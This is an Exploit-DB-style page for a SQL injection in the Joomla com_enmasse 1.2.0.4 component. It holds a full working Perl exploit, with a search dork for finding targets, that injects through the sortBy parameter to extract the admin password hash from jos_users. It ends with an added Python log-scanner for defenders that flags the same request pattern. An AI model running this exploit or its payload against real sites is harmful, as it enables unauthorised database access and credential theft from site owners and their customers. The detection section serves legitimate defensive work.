Joomla! Component com_enmasse 1.2.0.4 - SQL Injection

08 Aug 2012 | Reported by D4NB4R | Type: exploitdb | Source: www.exploit-db.com

This exploit affects Joomla com_enmasse 1.2.0.4 (SQL injection) and allows extraction of data from the jos_users table.

Code
       

# Exploit Title: Joomla com_enmasse Remote Exploit
# Author: Daniel Barragan "D4NB4R"


# Hi, this exploit affects e-commerce sites, so the exploit will only give a sample of the
# possible extraction of data. I am not responsible for any use that is made of it, since
# it is possible to obtain economic profit through it. The script is written against the
# default Joomla tables.



#!/usr/bin/perl -w

########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
# 
# Author: Daniel Barragan "D4NB4R"
# 
# Twitter: @D4NB4R
# 
# site: http://poisonsecurity.wordpress.com/
# 
# Vendor: http://www.matamko.com/
# 
# Version: 1.2.0.4 (last update on Jul 27, 2012)
# 
# License: Enmasse 6 Months Support & Subscription -  USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#  
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc.... 
########################################

print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t        Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

$concatene="concat(password)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {

print "\n Hash Admin : $1\n\n";
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
print " The exploit was successful if you want to see more data modify the script\n";

}
else{print "\n[-] No se pudo, intente manualmente\n";}

#####Daniel Barragan D4NB4R 2012################
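
For defenders, a log check for the request shape this script sends (an added example, not part of the original exploit or the vendor's code): it flags com_enmasse requests whose sortBy value carries SQL markers or is not a plain integer. The log lines are constructed samples, and treating a legitimate sortBy as numeric is an assumption based on the value 117 used above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers of the error-based technique visible in the request above.
SQL_MARKERS = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|\bselect\b.*\bfrom\b", re.I)

def classify(log_line):
    """Return a reason string for a suspicious com_enmasse request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %20 and %2C encoding is undone.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_enmasse" not in params.get("option", []):
        return None
    for value in params.get("sortBy", []):
        if SQL_MARKERS.search(value):
            return "sql-markers-in-sortBy"
        # Assumption: a legitimate sortBy is a plain integer (117 on this page).
        if not re.fullmatch(r"\d+", value.strip()):
            return "non-numeric-sortBy"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            hits.append((n, reason))
    return hits

# Constructed sample log lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Aug/2012:10:00:00 +0000] "GET /index.php?option=com_enmasse&controller=deal&sortBy=117 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Aug/2012:10:00:03 +0000] "GET /index.php?option=com_enmasse&controller=deal&sortBy=117%20and(select%201%20from%20information_schema.tables%20group%20by%20floor(rand(0)*2)) HTTP/1.1" 500 812',
    '198.51.100.7 - - [08/Aug/2012:10:00:09 +0000] "GET /index.php?option=com_enmasse&sortBy=117%27 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [08/Aug/2012:10:01:00 +0000] "GET /index.php?option=com_content&sortBy=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

A hit on the marker rule is the stronger signal; the non-numeric rule should be tuned if the installed component accepts other sortBy values.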

Vulners AI Score: 7 (High risk)